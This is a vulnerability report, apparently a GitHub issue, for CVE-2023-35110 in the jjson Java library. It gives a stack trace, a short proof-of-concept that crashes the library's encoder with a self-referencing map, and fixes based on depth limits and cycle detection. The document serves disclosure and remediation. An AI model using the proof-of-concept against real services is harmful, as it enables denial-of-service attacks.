CVE-2023-35110: Stack overflow error caused by jjson serialization Map · Issue #2 · grobmeier/jjson
An issue was discovered in jjson through 0.1.7 that allows attackers to cause a denial of service or other unspecified impacts via a crafted object that uses cyclic dependencies.
Stack overflow error caused by jjson serialization Map
Description
jjson before v0.1.7 was discovered to contain a stack overflow via the map parameter. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted string.
Error Log
Exception in thread "main" java.lang.StackOverflowError
at de.grobmeier.jjson.shaded.org.apache.commons.lang3.text.translate.AggregateTranslator.translate(AggregateTranslator.java:52)
at de.grobmeier.jjson.shaded.org.apache.commons.lang3.text.translate.AggregateTranslator.translate(AggregateTranslator.java:52)
at de.grobmeier.jjson.shaded.org.apache.commons.lang3.text.translate.CharSequenceTranslator.translate(CharSequenceTranslator.java:87)
at de.grobmeier.jjson.shaded.org.apache.commons.lang3.text.translate.CharSequenceTranslator.translate(CharSequenceTranslator.java:61)
at de.grobmeier.jjson.shaded.org.apache.commons.lang3.StringEscapeUtils.escapeJava(StringEscapeUtils.java:456)
at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeString(JSONAnnotationEncoder.java:286)
at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeMap(JSONAnnotationEncoder.java:149)
at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encode(JSONAnnotationEncoder.java:101)
at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeMap(JSONAnnotationEncoder.java:151)
at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encode(JSONAnnotationEncoder.java:101)
at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeMap(JSONAnnotationEncoder.java:151)
at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encode(JSONAnnotationEncoder.java:101)
at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeMap(JSONAnnotationEncoder.java:151)
at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encode(JSONAnnotationEncoder.java:101)
at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeMap(JSONAnnotationEncoder.java:151)
at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encode(JSONAnnotationEncoder.java:101)
at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeMap(JSONAnnotationEncoder.java:151)
at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encode(JSONAnnotationEncoder.java:101)
at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeMap(JSONAnnotationEncoder.java:151)
at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encode(JSONAnnotationEncoder.java:101)
at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeMap(JSONAnnotationEncoder.java:151)
at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encode(JSONAnnotationEncoder.java:101)
at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeMap(JSONAnnotationEncoder.java:151)
at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encode(JSONAnnotationEncoder.java:101)
at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeMap(JSONAnnotationEncoder.java:151)
at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encode(JSONAnnotationEncoder.java:101)
at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeMap(JSONAnnotationEncoder.java:151)
at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encode(JSONAnnotationEncoder.java:101)
at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeMap(JSONAnnotationEncoder.java:151)
at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encode(JSONAnnotationEncoder.java:101)
at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeMap(JSONAnnotationEncoder.java:151)
at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encode(JSONAnnotationEncoder.java:101)
at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeMap(JSONAnnotationEncoder.java:151)
PoC
<dependency>
    <groupId>de.grobmeier.json</groupId>
    <artifactId>jjson</artifactId>
    <version>0.1.7</version>
</dependency>
import de.grobmeier.jjson.JSONException;
import de.grobmeier.jjson.convert.JSONAnnotationEncoder;
import java.util.HashMap;

public class PoC2 {
    public static void main(String[] args) throws JSONException {
        HashMap<String, Object> map = new HashMap<>();
        // The map holds itself as a value, so the object graph is cyclic.
        map.put("t", map);
        JSONAnnotationEncoder jsonAnnotationEncoder = new JSONAnnotationEncoder();
        // encode() and encodeMap() recurse on the cycle until the stack is exhausted.
        jsonAnnotationEncoder.encode(map);
    }
}
Rectification Solution
Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (FasterXML/jackson-databind@fcfc499)
Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing. (google/gson@2d01d6a20f39881c692977564c1ea591d9f39027)
References
- If the value in map is the map’s self, the new new JSONObject(map) cause StackOverflowError which may lead to dos jettison-json/jettison#52
- https://github.com/jettison-json/jettison/pull/53/files
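The depth-threshold fix proposed under Rectification Solution, together with an identity-based check that catches the cyclic map from the PoC on its first revisit, is shown here as an added example. It is not jjson's code or its patch; GuardedEncoder, MAX_DEPTH and the limit of 64 are assumptions, and only maps, strings, numbers, booleans and null are encoded.

```java
import java.util.*;

// Added illustration, not jjson code. GuardedEncoder and MAX_DEPTH are hypothetical names.
public class GuardedEncoder {
    static final int MAX_DEPTH = 64; // assumed threshold
    // Identity set: a HashSet would call hashCode(), which recurses on a self-containing map.
    private final Set<Object> onPath = Collections.newSetFromMap(new IdentityHashMap<>());

    public String encode(Object value) {
        StringBuilder out = new StringBuilder();
        write(value, out, 0);
        return out.toString();
    }

    private void write(Object v, StringBuilder out, int depth) {
        if (v instanceof Map) {
            if (depth >= MAX_DEPTH) throw new IllegalStateException("nesting exceeds " + MAX_DEPTH);
            if (!onPath.add(v)) throw new IllegalStateException("cyclic reference at depth " + depth);
            try {
                String sep = "{";
                for (Map.Entry<?, ?> e : ((Map<?, ?>) v).entrySet()) {
                    out.append(sep).append(quote(String.valueOf(e.getKey()))).append(':');
                    write(e.getValue(), out, depth + 1);
                    sep = ",";
                }
                out.append(sep.equals("{") ? "{}" : "}");
            } finally {
                onPath.remove(v); // a shared but acyclic map may appear again on a sibling branch
            }
        } else {
            boolean bare = v == null || v instanceof Number || v instanceof Boolean;
            out.append(bare ? String.valueOf(v) : quote(String.valueOf(v)));
        }
    }

    private static String quote(String s) { // escapes backslash and double quote only
        return '"' + s.replace("\\", "\\\\").replace("\"", "\\\"") + '"';
    }

    public static void main(String[] args) {
        Map<String, Object> map = new HashMap<>();
        map.put("t", map); // the cyclic input from the PoC
        try {
            System.out.println(new GuardedEncoder().encode(map));
        } catch (IllegalStateException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The depth limit alone would also stop the PoC, but only after MAX_DEPTH frames; the identity check rejects the cycle immediately and leaves the depth limit to cover acyclic input that is simply nested too deeply.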
Related news
An issue was discovered in jjson through 0.1.7 that allows attackers to cause a denial of service or other unspecified impacts via crafted objects with deeply nested structures.